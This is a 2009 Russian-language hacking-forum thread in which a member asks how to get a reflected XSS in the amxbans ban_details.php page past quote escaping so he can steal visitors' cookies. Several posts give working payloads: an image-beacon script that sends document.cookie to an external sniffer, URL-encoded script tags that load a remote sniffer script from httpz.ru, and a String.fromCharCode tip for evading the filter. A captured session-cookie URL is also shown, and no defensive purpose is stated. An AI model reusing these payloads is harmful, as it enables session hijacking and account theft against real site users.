нужна помощь (пассивная xss?)

Discussion in 'Песочница' started by n3r0bi0m4n, 26 Aug 2009.

  1. n3r0bi0m4n

    n3r0bi0m4n New Member

    Joined:
    21 Aug 2005
    Messages:
    24
    Likes Received:
    2
    Reputations:
    2
    http://forum.antichat.ru/thread121710.html

    давным давно ничем подобным не занимался - вспоминаю..


    Вопрос, собственно: amxbans -> ban_details.php?ban_info[ban_reason]=/javascript_code/ работает частично. alert(document.cookie) проходит.


    Пытаюсь подставить <script>img = new Image(); img.src = "website/sniffimage.gif?"+document.cookie;</script> - оно "фильтрует" кавычки. Точнее, экранирует их в \"website/sniffimage.gif\".


    Залил простой скрипт (x.js: "<script>alert(hi);</script>") на сервер, пытался достучаться до него посредством <script src=blabla></script> дабы обойтись без кавычек. Не работает.

    Подскажите, пжалста, выходы из положения, или хотяб намекните. Благодарю заранее.
     
  2. seofilms

    seofilms Banned

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%68%69%29%3B%3C%2F%73%63%72%69%70%74%3E
    может так получится, точно незнаю )))
     
  3. n3r0bi0m4n

    n3r0bi0m4n New Member

    Joined:
    21 Aug 2005
    Messages:
    24
    Likes Received:
    2
    Reputations:
    2
    Спасибо, url-encode пробовал оба варианта. Не работает..
     
  4. seofilms

    seofilms Banned

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    вот еще как можно, на примере моего снифера
    %3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E
     
  5. n3r0bi0m4n

    n3r0bi0m4n New Member

    Joined:
    21 Aug 2005
    Messages:
    24
    Likes Received:
    2
    Reputations:
    2
    Тем-же снффом пользуюсь )..
    Оно мне не в лог пишет, а в адресной строке оставляет все куки:

    http://httpz.ru/nqk7ksje7ro.gif?PHPSESSID=cefd4708a36ea......
     
  6. seofilms

    seofilms Banned

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    так и в логе и там оставляет, можно мне адрес странички с xss в личку, может помогу ;)
     
  7. seofilms

    seofilms Banned

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    icq 781954
     
  8. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    юзай String.fromCharCode
     
  9. seofilms

    seofilms Banned

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    %3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E
    итак всё работает))) только что проверял))) у него что то со снифом наверно или он гонит))
     
    1 person likes this.
Loading...